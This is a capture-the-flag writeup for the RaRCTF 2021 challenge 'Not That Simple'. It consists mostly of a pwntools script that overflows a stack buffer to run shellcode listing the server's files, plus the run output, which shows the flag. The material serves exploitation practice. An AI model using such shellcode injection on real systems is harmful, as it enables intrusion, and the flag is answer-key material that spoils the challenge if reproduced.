CTFtime.org / RaRCTF 2021 / Not That Simple / Writeup

```python
from pwn import *
context.log_level = 'debug'
context(arch='amd64', os='linux')

# p = process('./notsimple')
# p = gdb.debug('./notsimple','b *main')
p = remote('193.57.159.27',35316)
print(p.recvuntil('ng! ').decode())
buf_addr = int(p.recvline().decode()[:-1],16)
print(hex(buf_addr))
print(p.recvuntil('> ').decode())

payload = b''
payload += asm('mov rsp,QWORD PTR fs:[0]')
payload += asm(shellcraft.open('.'))
payload += asm(shellcraft.getdents(3, 'rsp', 0x500))
payload += asm(shellcraft.write(1, 'rsp', 0x500))

payload += b'A'*(0x50 - len(payload))
payload += b'SFP_____'
payload += p64(buf_addr)
p.sendline(payload)
p.interactive()

# rarctf{h3y_wh4ts_th3_r3dpwn_4bs0rpti0n_pl4n_d01n6_h3r3?_4cc9581515}
```

```bash
shell$ python payload.py
[+] Opening connection to 193.57.159.27 on port 35316: Done
Oops, I'm leaking!
0x7ffd1ae96b30
Pwn me ¯\_(ツ)_/¯
>
[*] Switching to interactive mode
\x1b\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00V\x10\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00B\x8d
\x04\x00\x00\x00\x00\x00\x00\x00ILE_6768585\x00C\x8d
\x04\x00\x00\x00\x00\x00\x00\x00ILE_5786754\x00D\x8d
\x04\x00\x00\x00\x00\x00\x00\x00ILE_76498904\x00\x00\x00\x0E\x8d
\x04\x00\x00\x00\x00\x00\x00\x00ILE_6784577\x00F\x8d
\x04\x00\x00\x00\x00\x00\x00\x00ILE_eb94e79028\x00\x00\x0G\x8d
\x04\x00\x00\x00\x00\x00\x00\x00ILE_6758838\x00H\x8d
\x04\x00\x00\x00\x00\x00\x00\x00edpwn_absorption_plan.txt\x00\x00I\x8d
\x04\x00\x00\x00\x00\x00\x00\x00ILE_1d4a95be0c340478af4141d1658ddd9a304e0bbdf7402526f3fb6306b261309f8ff1183a907ca57d73fa662f8d52b2dea7986a7a195c2ae962c07d77dd8f684e7f9e5fe3ac575aafeaea1b09436ea3217d143e37584fc1d2a1e085535736fb81329fb093\x00\x00\x00\x0J\x8d
\x04\x00\x00\x00\x00\x00\x00\x00arctf{h3y_wh4ts_th3_r3dpwn_4bs0rpti0n_pl4n_d01n6_h3r3?_4cc9581515}\x0\x1c \x00\x00\x00\x00\x00\x00\x00\x00otsimple\x00\x0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0k\xe9?\xfd\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\Segmentation fault
[*] Got EOF while reading in interactive
$
```

Original writeup (https://gist.github.com/Circler-K/c23dda91b88e272f329e39e30c38307d).

Not That Simple

Comments

Sign in with